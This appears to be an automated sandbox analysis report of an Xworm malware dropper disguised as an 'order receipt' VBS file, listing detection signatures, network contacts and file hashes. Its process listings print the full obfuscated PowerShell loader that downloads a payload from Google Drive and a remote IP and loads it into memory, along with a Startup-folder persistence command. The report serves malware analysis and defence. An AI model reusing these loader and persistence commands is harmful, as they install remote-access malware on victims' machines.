Analysis Overview
SHA256
9eb00c37db0331a7a0ef2056bda5ffe8fde8d812f4d3f8b54f278ba041cfd2a0
Threat Level: Known bad
The file 30102024_0112_order_receipt#277.vbs was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm family
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Drops startup file
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-30 01:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-30 01:12
Reported
2024-10-30 01:17
Platform
win7-20240903-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cigas.vbs | C:\Windows\System32\WScript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cigas.vbs | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30102024_0112_order_receipt#277.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\30102024_0112_order_receipt#277.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.sagic.vbs')')
C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\30102024_0112_order_receipt#277.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.sagic.vbs')')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCc1ZFlpbWFnZVVybCcrJyA9IDhMVWh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9JysnMUFJVmdKSkp2MUY2dlM0cycrJ1VPeWJuSC1zRHZVaEJZd3VyIDhMVTs1ZFknKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OzVkWWltYWdlQnl0ZXMgPSA1ZFl3ZWJDbGllbnQuRG93bmxvYWQnKydEYXRhKDVkWWltYWdlVXJsKTs1ZFlpbWFnZVRleHQgPSBbU3lzdGVtLicrJ1RleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg1ZFlpbWFnZUJ5dGVzKTs1ZFlzdGFydEZsYWcgPSA4TFU8JysnPEJBU0U2NF9TJysnVEFSVD4+OExVOzVkWWVuZEZsYWcgJysnPSA4TFU8PEJBU0U2NF9FTkQ+PjhMVTs1ZFlzdGFydEluJysnZGV4ID0gNWRZaScrJ21hZ2VUZXh0LkluZGV4T2YoNWRZc3RhcnRGbGFnKTs1ZFllbmRJbmRleCA9IDVkWWltYWdlVGV4dC5JbmRleE9mKDVkWWVuZEZsYWcpOzVkWXN0YXJ0SW5kZXggLWdlIDAgLWFuZCcrJyA1ZFllbmRJbmRleCAtZ3QgNWRZc3RhcnRJbmRleDs1ZFlzdGFydEluZGV4ICs9IDVkWXN0YXJ0RmxhZy5MZW5ndGg7NWRZYmFzZTY0TGVuZ3RoID0gNWRZZW5kSW5kZXggLSA1ZFlzdGFydEluZGV4OzVkWWJhc2U2NENvbW1hbmQgPSA1ZFlpbWFnZVRleHQuU3Vic3RyaW5nKDVkWXN0YXJ0JysnSScrJ25kZXgsIDVkWWJhc2U2NExlbmd0aCk7NWRZYmFzZTY0UmV2ZXJzZWQgPSAtam9pbicrJyAoNWRZYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIEluZiBGb3JFYWNoLU9iamVjdCB7IDVkWScrJ18gfSlbLTEuLi0oNWRZYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTs1ZFljb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDVkWWJhc2U2NFJldmVyc2VkKTs1ZFlsb2FkZWRBc3NlbWJseSA9IFtTeScrJ3N0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoNWRZY29tbWFuZEJ5dGVzKTs1ZFl2YWlNZXRob2QgPSAnKydbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDhMVVYnKydBSThMVSk7NWRZdmFpTWV0aG9kLkludm9rZSg1ZFludWxsLCBAKDhMVXR4dC5zZ2EnKydyZXZldHMvanhzbi8xNTEuMTEuNjkxLjU4MS8vOnB0dGg4TFUsIDhMVWRlJysnc2F0aXZhZG84TFUsIDhMVWRlc2F0aXZhZG84TFUsIDhMVWRlc2F0aXZhZG84TFUsIDhMVVJlZ0FzbThMVSwgOExVZGVzYXRpdmFkbzhMVSwgOExVZGVzYXRpdmFkbzhMVSw4TFVkZXNhdGl2YWRvOEwnKydVLDhMVWRlc2F0aXZhZG84TFUsOExVZGVzYXRpdmFkbzhMJysnVSw4TFVkZXNhdGl2JysnYWRvOExVJysnLDhMVWRlc2F0aXZhZG84TFUsOExVMThMVSw4TFVkZXNhdGl2YWRvOExVKSk7JykuckVQTGFjRSgoW0NIQVJdNTYrW0NIQVJdNzYrW0NIQVJdODUpLFtzVFJJTmddW0NIQVJdMzkpLnJFUExhY0UoJzVkWScsJyQnKS5yRVBMYWNFKChbQ0hBUl03MytbQ0hBUl0xMTArW0NIQVJdMTAyKSwnfCcpIHwgJiAoICRTaGVMTGlkWzFdKyRzSGVMTElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('5dYimageUrl'+' = 8LUhttps://drive.google.com/uc?export=download&id='+'1AIVgJJJv1F6vS4s'+'UOybnH-sDvUhBYwur 8LU;5dY'+'webClient = New-Object System.Net.WebClient;5dYimageBytes = 5dYwebClient.Download'+'Data(5dYimageUrl);5dYimageText = [System.'+'Text.Encoding]::UTF8.GetString(5dYimageBytes);5dYstartFlag = 8LU<'+'<BASE64_S'+'TART>>8LU;5dYendFlag '+'= 8LU<<BASE64_END>>8LU;5dYstartIn'+'dex = 5dYi'+'mageText.IndexOf(5dYstartFlag);5dYendIndex = 5dYimageText.IndexOf(5dYendFlag);5dYstartIndex -ge 0 -and'+' 5dYendIndex -gt 5dYstartIndex;5dYstartIndex += 5dYstartFlag.Length;5dYbase64Length = 5dYendIndex - 5dYstartIndex;5dYbase64Command = 5dYimageText.Substring(5dYstart'+'I'+'ndex, 5dYbase64Length);5dYbase64Reversed = -join'+' (5dYbase64Command.ToCharArray() Inf ForEach-Object { 5dY'+'_ })[-1..-(5dYbase64Command.Length)];5dYcommandBytes = [System.Convert]::FromBase64String(5dYbase64Reversed);5dYloadedAssembly = [Sy'+'stem.Reflection.Assembly]::Load(5dYcommandBytes);5dYvaiMethod = '+'[dnlib.IO.Home].GetMethod(8LUV'+'AI8LU);5dYvaiMethod.Invoke(5dYnull, @(8LUtxt.sga'+'revets/jxsn/151.11.691.581//:ptth8LU, 8LUde'+'sativado8LU, 8LUdesativado8LU, 8LUdesativado8LU, 8LURegAsm8LU, 8LUdesativado8LU, 8LUdesativado8LU,8LUdesativado8L'+'U,8LUdesativado8LU,8LUdesativado8L'+'U,8LUdesativ'+'ado8LU'+',8LUdesativado8LU,8LU18LU,8LUdesativado8LU));').rEPLacE(([CHAR]56+[CHAR]76+[CHAR]85),[sTRINg][CHAR]39).rEPLacE('5dY','$').rEPLacE(([CHAR]73+[CHAR]110+[CHAR]102),'|') | & ( $SheLLid[1]+$sHeLLId[13]+'X')"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.179.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.187.193:443 | drive.usercontent.google.com | tcp |
Files
memory/2708-5-0x000007FEF58AE000-0x000007FEF58AF000-memory.dmp
memory/2708-7-0x000000001B520000-0x000000001B802000-memory.dmp
memory/2708-6-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp
memory/2708-10-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp
memory/2708-9-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp
memory/2708-8-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/2708-11-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp
memory/2708-12-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp
memory/2708-13-0x000007FEF55F0000-0x000007FEF5F8D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7GB9GT949ZD1WX0FC3A1.temp
| MD5 | 8abfbdae7fbfdb1630628079d501f4a3 |
| SHA1 | 38c79dc59b02307a5d3a669d2f5a02b50d651208 |
| SHA256 | 7fe9682ec1d039b95d949d77717e8d657a133ec22136a51ef0425a782a31d040 |
| SHA512 | b148e67c4fb5eafd6ac8a957f34f343176a23bb6cc77595d03e67890954b64d53b8b848f2387ebef7c6ee9e65cbfc47418516ef0879a9e74fcac9a4159664b67 |
memory/2140-19-0x000000001B690000-0x000000001B972000-memory.dmp
memory/2140-20-0x0000000002350000-0x0000000002358000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/864-29-0x000000001AE90000-0x000000001AFEA000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-30 01:12
Reported
2024-10-30 01:17
Platform
win10v2004-20241007-en
Max time kernel
133s
Max time network
295s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cigas.vbs | C:\Windows\System32\WScript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cigas.vbs | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4084 set thread context of 4612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30102024_0112_order_receipt#277.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\30102024_0112_order_receipt#277.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.sagic.vbs')')
C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\30102024_0112_order_receipt#277.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.sagic.vbs')')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCc1ZFlpbWFnZVVybCcrJyA9IDhMVWh0dHBzOi8vZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9JysnMUFJVmdKSkp2MUY2dlM0cycrJ1VPeWJuSC1zRHZVaEJZd3VyIDhMVTs1ZFknKyd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OzVkWWltYWdlQnl0ZXMgPSA1ZFl3ZWJDbGllbnQuRG93bmxvYWQnKydEYXRhKDVkWWltYWdlVXJsKTs1ZFlpbWFnZVRleHQgPSBbU3lzdGVtLicrJ1RleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyg1ZFlpbWFnZUJ5dGVzKTs1ZFlzdGFydEZsYWcgPSA4TFU8JysnPEJBU0U2NF9TJysnVEFSVD4+OExVOzVkWWVuZEZsYWcgJysnPSA4TFU8PEJBU0U2NF9FTkQ+PjhMVTs1ZFlzdGFydEluJysnZGV4ID0gNWRZaScrJ21hZ2VUZXh0LkluZGV4T2YoNWRZc3RhcnRGbGFnKTs1ZFllbmRJbmRleCA9IDVkWWltYWdlVGV4dC5JbmRleE9mKDVkWWVuZEZsYWcpOzVkWXN0YXJ0SW5kZXggLWdlIDAgLWFuZCcrJyA1ZFllbmRJbmRleCAtZ3QgNWRZc3RhcnRJbmRleDs1ZFlzdGFydEluZGV4ICs9IDVkWXN0YXJ0RmxhZy5MZW5ndGg7NWRZYmFzZTY0TGVuZ3RoID0gNWRZZW5kSW5kZXggLSA1ZFlzdGFydEluZGV4OzVkWWJhc2U2NENvbW1hbmQgPSA1ZFlpbWFnZVRleHQuU3Vic3RyaW5nKDVkWXN0YXJ0JysnSScrJ25kZXgsIDVkWWJhc2U2NExlbmd0aCk7NWRZYmFzZTY0UmV2ZXJzZWQgPSAtam9pbicrJyAoNWRZYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIEluZiBGb3JFYWNoLU9iamVjdCB7IDVkWScrJ18gfSlbLTEuLi0oNWRZYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTs1ZFljb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDVkWWJhc2U2NFJldmVyc2VkKTs1ZFlsb2FkZWRBc3NlbWJseSA9IFtTeScrJ3N0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoNWRZY29tbWFuZEJ5dGVzKTs1ZFl2YWlNZXRob2QgPSAnKydbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDhMVVYnKydBSThMVSk7NWRZdmFpTWV0aG9kLkludm9rZSg1ZFludWxsLCBAKDhMVXR4dC5zZ2EnKydyZXZldHMvanhzbi8xNTEuMTEuNjkxLjU4MS8vOnB0dGg4TFUsIDhMVWRlJysnc2F0aXZhZG84TFUsIDhMVWRlc2F0aXZhZG84TFUsIDhMVWRlc2F0aXZhZG84TFUsIDhMVVJlZ0FzbThMVSwgOExVZGVzYXRpdmFkbzhMVSwgOExVZGVzYXRpdmFkbzhMVSw4TFVkZXNhdGl2YWRvOEwnKydVLDhMVWRlc2F0aXZhZG84TFUsOExVZGVzYXRpdmFkbzhMJysnVSw4TFVkZXNhdGl2JysnYWRvOExVJysnLDhMVWRlc2F0aXZhZG84TFUsOExVMThMVSw4TFVkZXNhdGl2YWRvOExVKSk7JykuckVQTGFjRSgoW0NIQVJdNTYrW0NIQVJdNzYrW0NIQVJdODUpLFtzVFJJTmddW0NIQVJdMzkpLnJFUExhY0UoJzVkWScsJyQnKS5yRVBMYWNFKChbQ0hBUl03MytbQ0hBUl0xMTArW0NIQVJdMTAyKSwnfCcpIHwgJiAoICRTaGVMTGlkWzFdKyRzSGVMTElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('5dYimageUrl'+' = 8LUhttps://drive.google.com/uc?export=download&id='+'1AIVgJJJv1F6vS4s'+'UOybnH-sDvUhBYwur 8LU;5dY'+'webClient = New-Object System.Net.WebClient;5dYimageBytes = 5dYwebClient.Download'+'Data(5dYimageUrl);5dYimageText = [System.'+'Text.Encoding]::UTF8.GetString(5dYimageBytes);5dYstartFlag = 8LU<'+'<BASE64_S'+'TART>>8LU;5dYendFlag '+'= 8LU<<BASE64_END>>8LU;5dYstartIn'+'dex = 5dYi'+'mageText.IndexOf(5dYstartFlag);5dYendIndex = 5dYimageText.IndexOf(5dYendFlag);5dYstartIndex -ge 0 -and'+' 5dYendIndex -gt 5dYstartIndex;5dYstartIndex += 5dYstartFlag.Length;5dYbase64Length = 5dYendIndex - 5dYstartIndex;5dYbase64Command = 5dYimageText.Substring(5dYstart'+'I'+'ndex, 5dYbase64Length);5dYbase64Reversed = -join'+' (5dYbase64Command.ToCharArray() Inf ForEach-Object { 5dY'+'_ })[-1..-(5dYbase64Command.Length)];5dYcommandBytes = [System.Convert]::FromBase64String(5dYbase64Reversed);5dYloadedAssembly = [Sy'+'stem.Reflection.Assembly]::Load(5dYcommandBytes);5dYvaiMethod = '+'[dnlib.IO.Home].GetMethod(8LUV'+'AI8LU);5dYvaiMethod.Invoke(5dYnull, @(8LUtxt.sga'+'revets/jxsn/151.11.691.581//:ptth8LU, 8LUde'+'sativado8LU, 8LUdesativado8LU, 8LUdesativado8LU, 8LURegAsm8LU, 8LUdesativado8LU, 8LUdesativado8LU,8LUdesativado8L'+'U,8LUdesativado8LU,8LUdesativado8L'+'U,8LUdesativ'+'ado8LU'+',8LUdesativado8LU,8LU18LU,8LUdesativado8LU));').rEPLacE(([CHAR]56+[CHAR]76+[CHAR]85),[sTRINg][CHAR]39).rEPLacE('5dY','$').rEPLacE(([CHAR]73+[CHAR]110+[CHAR]102),'|') | & ( $SheLLid[1]+$sHeLLId[13]+'X')"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.179.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.187.193:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.187.250.142.in-addr.arpa | udp |
| CH | 185.196.11.151:80 | 185.196.11.151 | tcp |
| US | 8.8.8.8:53 | 151.11.196.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| RU | 45.15.158.112:6767 | tcp | |
| US | 8.8.8.8:53 | 112.158.15.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
Files
memory/1548-1-0x00007FFBAB403000-0x00007FFBAB405000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_snx1p3ss.ndc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1548-2-0x00000273E5830000-0x00000273E5852000-memory.dmp
memory/1548-12-0x00007FFBAB400000-0x00007FFBABEC1000-memory.dmp
memory/1548-13-0x00007FFBAB400000-0x00007FFBABEC1000-memory.dmp
memory/1548-16-0x00007FFBAB400000-0x00007FFBABEC1000-memory.dmp
memory/1548-17-0x00007FFBAB400000-0x00007FFBABEC1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d3e9c29fe44e90aae6ed30ccf799ca8 |
| SHA1 | c7974ef72264bbdf13a2793ccf1aed11bc565dce |
| SHA256 | 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d |
| SHA512 | 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a |
memory/4084-38-0x000002C3E9530000-0x000002C3E968A000-memory.dmp
memory/4612-39-0x0000000000400000-0x0000000000410000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9586354a4e91c47c933ad60ce6938173 |
| SHA1 | dec4912b03333ca2bace7e1435d0c06c4dca63c8 |
| SHA256 | dce1a16d983f7535ac242dd12223197ab2f6bce97c73899be5c7ecafe7ac4a11 |
| SHA512 | 9a4a2413857d6877b5176f810a51ee075449d7a484ea0ab232571104ecacdf830ef48318df54817b95aaa73cc6f064d61eb3dd003344ec0fd1565ae49bb01c2f |
memory/4612-43-0x00000000050F0000-0x000000000518C000-memory.dmp
memory/4612-44-0x0000000006380000-0x0000000006924000-memory.dmp
memory/4612-45-0x0000000006240000-0x00000000062D2000-memory.dmp
memory/4612-46-0x0000000006220000-0x000000000622A000-memory.dmp
memory/4612-47-0x0000000006A60000-0x0000000006AC6000-memory.dmp